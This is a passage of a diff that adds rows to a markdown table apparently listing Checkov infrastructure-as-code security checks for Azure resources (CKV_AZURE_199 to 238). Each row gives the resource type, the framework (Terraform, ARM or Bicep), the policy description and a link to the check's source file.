+| 2134 | CKV_AZURE_199            | resource                         | azurerm_servicebus_namespace                                                                     | Ensure that Azure Service Bus uses double encryption                                                                                                                                                     | Terraform               | [AzureServicebusDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusDoubleEncryptionEnabled.py)                                                 |
+| 2135 | CKV_AZURE_200            | resource                         | azurerm_cdn_endpoint_custom_domain                                                               | Ensure the Azure CDN endpoint is using the latest version of TLS encryption                                                                                                                              | Terraform               | [CDNTLSProtocol12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNTLSProtocol12.py)                                                                                             |
+| 2136 | CKV_AZURE_201            | resource                         | azurerm_servicebus_namespace                                                                     | Ensure that Azure Service Bus uses a customer-managed key to encrypt data                                                                                                                                | Terraform               | [AzureServicebusHasCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusHasCMK.py)                                                                                   |
+| 2137 | CKV_AZURE_202            | resource                         | azurerm_servicebus_namespace                                                                     | Ensure that Managed identity provider is enabled for Azure Service Bus                                                                                                                                   | Terraform               | [AzureServicebusIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusIdentityProviderEnabled.py)                                                 |
+| 2138 | CKV_AZURE_203            | resource                         | azurerm_servicebus_namespace                                                                     | Ensure Azure Service Bus Local Authentication is disabled                                                                                                                                                | Terraform               | [AzureServicebusLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusLocalAuthDisabled.py)                                                             |
+| 2139 | CKV_AZURE_204            | resource                         | azurerm_servicebus_namespace                                                                     | Ensure 'public network access enabled' is set to 'False' for Azure Service Bus                                                                                                                           | Terraform               | [AzureServicebusPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusPublicAccessDisabled.py)                                                       |
+| 2140 | CKV_AZURE_205            | resource                         | azurerm_servicebus_namespace                                                                     | Ensure Azure Service Bus is using the latest version of TLS encryption                                                                                                                                   | Terraform               | [AzureServicebusMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusMinTLSVersion.py)                                                                     |
+| 2141 | CKV_AZURE_206            | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure that Storage Accounts use replication                                                                                                                                                             | arm                     | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsUseReplication.py)                                                                               |
+| 2142 | CKV_AZURE_206            | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure that Storage Accounts use replication                                                                                                                                                             | Bicep                   | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsUseReplication.py)                                                                               |
+| 2143 | CKV_AZURE_206            | resource                         | azurerm_storage_account                                                                          | Ensure that Storage Accounts use replication                                                                                                                                                             | Terraform               | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsUseReplication.py)                                                                   |
+| 2144 | CKV_AZURE_207            | resource                         | azurerm_search_service                                                                           | Ensure Azure Cognitive Search service uses managed identities to access Azure resources                                                                                                                  | Terraform               | [AzureSearchManagedIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchManagedIdentity.py)                                                                         |
+| 2145 | CKV_AZURE_208            | resource                         | Microsoft.Search/searchServices                                                                  | Ensure that Azure Cognitive Search maintains SLA for index updates                                                                                                                                       | arm                     | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSearchSLAIndex.py)                                                                                                   |
+| 2146 | CKV_AZURE_208            | resource                         | Microsoft.Search/searchServices                                                                  | Ensure that Azure Cognitive Search maintains SLA for index updates                                                                                                                                       | Bicep                   | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSearchSLAIndex.py)                                                                                                   |
+| 2147 | CKV_AZURE_208            | resource                         | azurerm_search_service                                                                           | Ensure that Azure Cognitive Search maintains SLA for index updates                                                                                                                                       | Terraform               | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAIndex.py)                                                                                       |
+| 2148 | CKV_AZURE_209            | resource                         | Microsoft.Search/searchServices                                                                  | Ensure that Azure Cognitive Search maintains SLA for search index queries                                                                                                                                | arm                     | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSearchSLAQueryUpdates.py)                                                                                     |
+| 2149 | CKV_AZURE_209            | resource                         | Microsoft.Search/searchServices                                                                  | Ensure that Azure Cognitive Search maintains SLA for search index queries                                                                                                                                | Bicep                   | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSearchSLAQueryUpdates.py)                                                                                     |
+| 2150 | CKV_AZURE_209            | resource                         | azurerm_search_service                                                                           | Ensure that Azure Cognitive Search maintains SLA for search index queries                                                                                                                                | Terraform               | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAQueryUpdates.py)                                                                         |
+| 2151 | CKV_AZURE_210            | resource                         | azurerm_search_service                                                                           | Ensure Azure Cognitive Search service allowed IPS does not give public Access                                                                                                                            | Terraform               | [AzureSearchAllowedIPsNotGlobal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchAllowedIPsNotGlobal.py)                                                                 |
+| 2152 | CKV_AZURE_211            | resource                         | azurerm_service_plan                                                                             | Ensure App Service plan suitable for production use                                                                                                                                                      | Terraform               | [AppServiceSkuMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSkuMinimum.py)                                                                                     |
+| 2153 | CKV_AZURE_212            | resource                         | Microsoft.Web/sites                                                                              | Ensure App Service has a minimum number of instances for failover                                                                                                                                        | arm                     | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceInstanceMinimum.py)                                                                                       |
+| 2154 | CKV_AZURE_212            | resource                         | Microsoft.Web/sites                                                                              | Ensure App Service has a minimum number of instances for failover                                                                                                                                        | Bicep                   | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceInstanceMinimum.py)                                                                                       |
+| 2155 | CKV_AZURE_212            | resource                         | Microsoft.Web/sites/slots                                                                        | Ensure App Service has a minimum number of instances for failover                                                                                                                                        | arm                     | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceInstanceMinimum.py)                                                                                       |
+| 2156 | CKV_AZURE_212            | resource                         | Microsoft.Web/sites/slots                                                                        | Ensure App Service has a minimum number of instances for failover                                                                                                                                        | Bicep                   | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceInstanceMinimum.py)                                                                                       |
+| 2157 | CKV_AZURE_212            | resource                         | azurerm_service_plan                                                                             | Ensure App Service has a minimum number of instances for failover                                                                                                                                        | Terraform               | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceInstanceMinimum.py)                                                                           |
+| 2158 | CKV_AZURE_213            | resource                         | Microsoft.Web/sites                                                                              | Ensure that App Service configures health check                                                                                                                                                          | arm                     | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSetHealthCheck.py)                                                                                         |
+| 2159 | CKV_AZURE_213            | resource                         | Microsoft.Web/sites                                                                              | Ensure that App Service configures health check                                                                                                                                                          | Bicep                   | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSetHealthCheck.py)                                                                                         |
+| 2160 | CKV_AZURE_213            | resource                         | Microsoft.Web/sites/slots                                                                        | Ensure that App Service configures health check                                                                                                                                                          | arm                     | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSetHealthCheck.py)                                                                                         |
+| 2161 | CKV_AZURE_213            | resource                         | Microsoft.Web/sites/slots                                                                        | Ensure that App Service configures health check                                                                                                                                                          | Bicep                   | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSetHealthCheck.py)                                                                                         |
+| 2162 | CKV_AZURE_213            | resource                         | azurerm_app_service                                                                              | Ensure that App Service configures health check                                                                                                                                                          | Terraform               | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py)                                                                             |
+| 2163 | CKV_AZURE_213            | resource                         | azurerm_linux_web_app                                                                            | Ensure that App Service configures health check                                                                                                                                                          | Terraform               | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py)                                                                             |
+| 2164 | CKV_AZURE_213            | resource                         | azurerm_windows_web_app                                                                          | Ensure that App Service configures health check                                                                                                                                                          | Terraform               | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py)                                                                             |
+| 2165 | CKV_AZURE_214            | resource                         | azurerm_linux_web_app                                                                            | Ensure App Service is set to be always on                                                                                                                                                                | Terraform               | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py)                                                                                         |
+| 2166 | CKV_AZURE_214            | resource                         | azurerm_windows_web_app                                                                          | Ensure App Service is set to be always on                                                                                                                                                                | Terraform               | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py)                                                                                         |
+| 2167 | CKV_AZURE_215            | resource                         | azurerm_api_management_backend                                                                   | Ensure API management backend uses https                                                                                                                                                                 | Terraform               | [APIManagementBackendHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementBackendHTTPS.py)                                                                           |
+| 2168 | CKV_AZURE_216            | resource                         | Microsoft.Network/azureFirewalls                                                                 | Ensure DenyIntelMode is set to Deny for Azure Firewalls                                                                                                                                                  | arm                     | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py)                                                                         |
+| 2169 | CKV_AZURE_216            | resource                         | Microsoft.Network/azureFirewalls                                                                 | Ensure DenyIntelMode is set to Deny for Azure Firewalls                                                                                                                                                  | Bicep                   | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py)                                                                         |
+| 2170 | CKV_AZURE_216            | resource                         | azurerm_firewall                                                                                 | Ensure DenyIntelMode is set to Deny for Azure Firewalls                                                                                                                                                  | Terraform               | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDenyThreatIntelMode.py)                                                             |
+| 2171 | CKV_AZURE_217            | resource                         | azurerm_application_gateway                                                                      | Ensure Azure Application gateways listener that allow connection requests over HTTP                                                                                                                      | Terraform               | [AppGWUsesHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUsesHttps.py)                                                                                                 |
+| 2172 | CKV_AZURE_218            | resource                         | Microsoft.Network/applicationGateways                                                            | Ensure Application Gateway defines secure protocols for in transit communication                                                                                                                         | arm                     | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py)                                                                                   |
+| 2173 | CKV_AZURE_218            | resource                         | Microsoft.Network/applicationGateways                                                            | Ensure Application Gateway defines secure protocols for in transit communication                                                                                                                         | Bicep                   | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py)                                                                                   |
+| 2174 | CKV_AZURE_218            | resource                         | azurerm_application_gateway                                                                      | Ensure Application Gateway defines secure protocols for in transit communication                                                                                                                         | Terraform               | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWDefinesSecureProtocols.py)                                                                       |
+| 2175 | CKV_AZURE_219            | resource                         | azurerm_firewall                                                                                 | Ensure Firewall defines a firewall policy                                                                                                                                                                | Terraform               | [AzureFirewallDefinesPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDefinesPolicy.py)                                                                         |
+| 2176 | CKV_AZURE_220            | resource                         | azurerm_firewall_policy                                                                          | Ensure Firewall policy has IDPS mode as deny                                                                                                                                                             | Terraform               | [AzureFirewallPolicyIDPSDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallPolicyIDPSDeny.py)                                                                       |
+| 2177 | CKV_AZURE_221            | resource                         | azurerm_linux_function_app                                                                       | Ensure that Azure Function App public network access is disabled                                                                                                                                         | Terraform               | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py)                                                               |
+| 2178 | CKV_AZURE_221            | resource                         | azurerm_linux_function_app_slot                                                                  | Ensure that Azure Function App public network access is disabled                                                                                                                                         | Terraform               | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py)                                                               |
+| 2179 | CKV_AZURE_221            | resource                         | azurerm_windows_function_app                                                                     | Ensure that Azure Function App public network access is disabled                                                                                                                                         | Terraform               | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py)                                                               |
+| 2180 | CKV_AZURE_221            | resource                         | azurerm_windows_function_app_slot                                                                | Ensure that Azure Function App public network access is disabled                                                                                                                                         | Terraform               | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py)                                                               |
+| 2181 | CKV_AZURE_222            | resource                         | Microsoft.Web/sites                                                                              | Ensure that Azure Web App public network access is disabled                                                                                                                                              | arm                     | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py)                                                                             |
+| 2182 | CKV_AZURE_222            | resource                         | Microsoft.Web/sites                                                                              | Ensure that Azure Web App public network access is disabled                                                                                                                                              | Bicep                   | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py)                                                                             |
+| 2183 | CKV_AZURE_222            | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that Azure Web App public network access is disabled                                                                                                                                              | arm                     | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py)                                                                             |
+| 2184 | CKV_AZURE_222            | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that Azure Web App public network access is disabled                                                                                                                                              | Bicep                   | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py)                                                                             |
+| 2185 | CKV_AZURE_222            | resource                         | Microsoft.Web/sites/slots                                                                        | Ensure that Azure Web App public network access is disabled                                                                                                                                              | arm                     | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py)                                                                             |
+| 2186 | CKV_AZURE_222            | resource                         | Microsoft.Web/sites/slots                                                                        | Ensure that Azure Web App public network access is disabled                                                                                                                                              | Bicep                   | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py)                                                                             |
+| 2187 | CKV_AZURE_222            | resource                         | azurerm_linux_web_app                                                                            | Ensure that Azure Web App public network access is disabled                                                                                                                                              | Terraform               | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py)                                                                 |
+| 2188 | CKV_AZURE_222            | resource                         | azurerm_windows_web_app                                                                          | Ensure that Azure Web App public network access is disabled                                                                                                                                              | Terraform               | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py)                                                                 |
+| 2189 | CKV_AZURE_223            | resource                         | Microsoft.EventHub/namespaces                                                                    | Ensure Event Hub Namespace uses at least TLS 1.2                                                                                                                                                         | arm                     | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventHubNamespaceMinTLS12.py)                                                                                       |
+| 2190 | CKV_AZURE_223            | resource                         | Microsoft.EventHub/namespaces                                                                    | Ensure Event Hub Namespace uses at least TLS 1.2                                                                                                                                                         | Bicep                   | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventHubNamespaceMinTLS12.py)                                                                                       |
+| 2191 | CKV_AZURE_223            | resource                         | azurerm_eventhub_namespace                                                                       | Ensure Event Hub Namespace uses at least TLS 1.2                                                                                                                                                         | Terraform               | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceMinTLS12.py)                                                                           |
+| 2192 | CKV_AZURE_224            | resource                         | azurerm_mssql_database                                                                           | Ensure that the Ledger feature is enabled on database that requires cryptographic proof and nonrepudiation of data integrity                                                                             | Terraform               | [SQLDatabaseLedgerEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseLedgerEnabled.py)                                                                             |
+| 2193 | CKV_AZURE_225            | resource                         | Microsoft.Web/serverfarms                                                                        | Ensure the App Service Plan is zone redundant                                                                                                                                                            | arm                     | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePlanZoneRedundant.py)                                                                                   |
+| 2194 | CKV_AZURE_225            | resource                         | Microsoft.Web/serverfarms                                                                        | Ensure the App Service Plan is zone redundant                                                                                                                                                            | Bicep                   | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePlanZoneRedundant.py)                                                                                   |
+| 2195 | CKV_AZURE_225            | resource                         | azurerm_service_plan                                                                             | Ensure the App Service Plan is zone redundant                                                                                                                                                            | Terraform               | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePlanZoneRedundant.py)                                                                       |
+| 2196 | CKV_AZURE_226            | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure ephemeral disks are used for OS disks                                                                                                                                                             | arm                     | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEphemeralOSDisks.py)                                                                                                   |
+| 2197 | CKV_AZURE_226            | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure ephemeral disks are used for OS disks                                                                                                                                                             | Bicep                   | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEphemeralOSDisks.py)                                                                                                   |
+| 2198 | CKV_AZURE_226            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure ephemeral disks are used for OS disks                                                                                                                                                             | Terraform               | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEphemeralOSDisks.py)                                                                                       |
+| 2199 | CKV_AZURE_227            | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources                                                                                             | arm                     | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py)                                                                                     |
+| 2200 | CKV_AZURE_227            | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources                                                                                             | Bicep                   | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py)                                                                                     |
+| 2201 | CKV_AZURE_227            | resource                         | Microsoft.ContainerService/managedClusters/agentPools                                            | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources                                                                                             | arm                     | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py)                                                                                     |
+| 2202 | CKV_AZURE_227            | resource                         | Microsoft.ContainerService/managedClusters/agentPools                                            | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources                                                                                             | Bicep                   | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py)                                                                                     |
+| 2203 | CKV_AZURE_227            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources                                                                                             | Terraform               | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py)                                                                         |
+| 2204 | CKV_AZURE_227            | resource                         | azurerm_kubernetes_cluster_node_pool                                                             | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources                                                                                             | Terraform               | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py)                                                                         |
+| 2205 | CKV_AZURE_228            | resource                         | azurerm_eventhub_namespace                                                                       | Ensure the Azure Event Hub Namespace is zone redundant                                                                                                                                                   | Terraform               | [EventHubNamespaceZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceZoneRedundant.py)                                                                 |
+| 2206 | CKV_AZURE_229            | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure the Azure SQL Database Namespace is zone redundant                                                                                                                                                | arm                     | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLDatabaseZoneRedundant.py)                                                                                         |
+| 2207 | CKV_AZURE_229            | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure the Azure SQL Database Namespace is zone redundant                                                                                                                                                | Bicep                   | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLDatabaseZoneRedundant.py)                                                                                         |
+| 2208 | CKV_AZURE_229            | resource                         | azurerm_mssql_database                                                                           | Ensure the Azure SQL Database Namespace is zone redundant                                                                                                                                                | Terraform               | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseZoneRedundant.py)                                                                             |
+| 2209 | CKV_AZURE_230            | resource                         | azurerm_redis_cache                                                                              | Standard Replication should be enabled                                                                                                                                                                   | Terraform               | [RedisCacheStandardReplicationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheStandardReplicationEnabled.py)                                                     |
+| 2210 | CKV_AZURE_231            | resource                         | azurerm_app_service_environment_v3                                                               | Ensure App Service Environment is zone redundant                                                                                                                                                         | Terraform               | [AppServiceEnvironmentZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnvironmentZoneRedundant.py)                                                         |
+| 2211 | CKV_AZURE_232            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure that only critical system pods run on system nodes                                                                                                                                                | Terraform               | [AKSOnlyCriticalPodsOnSystemNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSOnlyCriticalPodsOnSystemNodes.py)                                                             |
+| 2212 | CKV_AZURE_233            | resource                         | Microsoft.ContainerRegistry/registries                                                           | Ensure Azure Container Registry (ACR) is zone redundant                                                                                                                                                  | arm                     | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableZoneRedundancy.py)                                                                                           |
+| 2213 | CKV_AZURE_233            | resource                         | Microsoft.ContainerRegistry/registries                                                           | Ensure Azure Container Registry (ACR) is zone redundant                                                                                                                                                  | Bicep                   | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableZoneRedundancy.py)                                                                                           |
+| 2214 | CKV_AZURE_233            | resource                         | Microsoft.ContainerRegistry/registries/replications                                              | Ensure Azure Container Registry (ACR) is zone redundant                                                                                                                                                  | arm                     | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableZoneRedundancy.py)                                                                                           |
+| 2215 | CKV_AZURE_233            | resource                         | Microsoft.ContainerRegistry/registries/replications                                              | Ensure Azure Container Registry (ACR) is zone redundant                                                                                                                                                  | Bicep                   | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableZoneRedundancy.py)                                                                                           |
+| 2216 | CKV_AZURE_233            | resource                         | azurerm_container_registry                                                                       | Ensure Azure Container Registry (ACR) is zone redundant                                                                                                                                                  | Terraform               | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableZoneRedundancy.py)                                                                               |
+| 2217 | CKV_AZURE_234            | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender for cloud is set to On for Resource Manager                                                                                                                                   | Terraform               | [AzureDefenderDisabledForResManager.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderDisabledForResManager.py)                                                         |
+| 2218 | CKV_AZURE_235            | resource                         | azurerm_container_group                                                                          | Ensure that Azure container environment variables are configured with secure values only                                                                                                                 | Terraform               | [AzureContainerInstanceEnvVarSecureValueType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerInstanceEnvVarSecureValueType.py)                                       |
+| 2219 | CKV_AZURE_236            | resource                         | Microsoft.CognitiveServices/accounts                                                             | Ensure that Cognitive Services accounts disable local authentication                                                                                                                                     | arm                     | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py)                                                                         |
+| 2220 | CKV_AZURE_236            | resource                         | Microsoft.CognitiveServices/accounts                                                             | Ensure that Cognitive Services accounts disable local authentication                                                                                                                                     | Bicep                   | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py)                                                                         |
+| 2221 | CKV_AZURE_236            | resource                         | azurerm_cognitive_account                                                                        | Ensure that Cognitive Services accounts disable local authentication                                                                                                                                     | Terraform               | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py)                                                             |
+| 2222 | CKV_AZURE_237            | resource                         | azurerm_container_registry                                                                       | Ensure dedicated data endpoints are enabled.                                                                                                                                                             | Terraform               | [ACRDedicatedDataEndpointEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py)                                                               |
+| 2223 | CKV_AZURE_238            | resource                         | Microsoft.CognitiveServices/accounts                                                             | Ensure that all Azure Cognitive Services accounts are configured with a managed identity                                                                                                                 | arm                     | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py)                                                                     |
+| 2224 | CKV_AZURE_238            | resource                         | Microsoft.CognitiveServices/accounts                                                             | Ensure that all Azure Cognitive Services accounts are configured with a managed identity                                                                                                                 | Bicep                   | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py)                                                                     |
+| 2225 | CKV_AZURE_238            | resource                         | azurerm_cognitive_account                                                                        | Ensure that all Azure Cognitive Services accounts are configured with a managed identity                                                                                                                 | Terraform               | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py)                                                         |
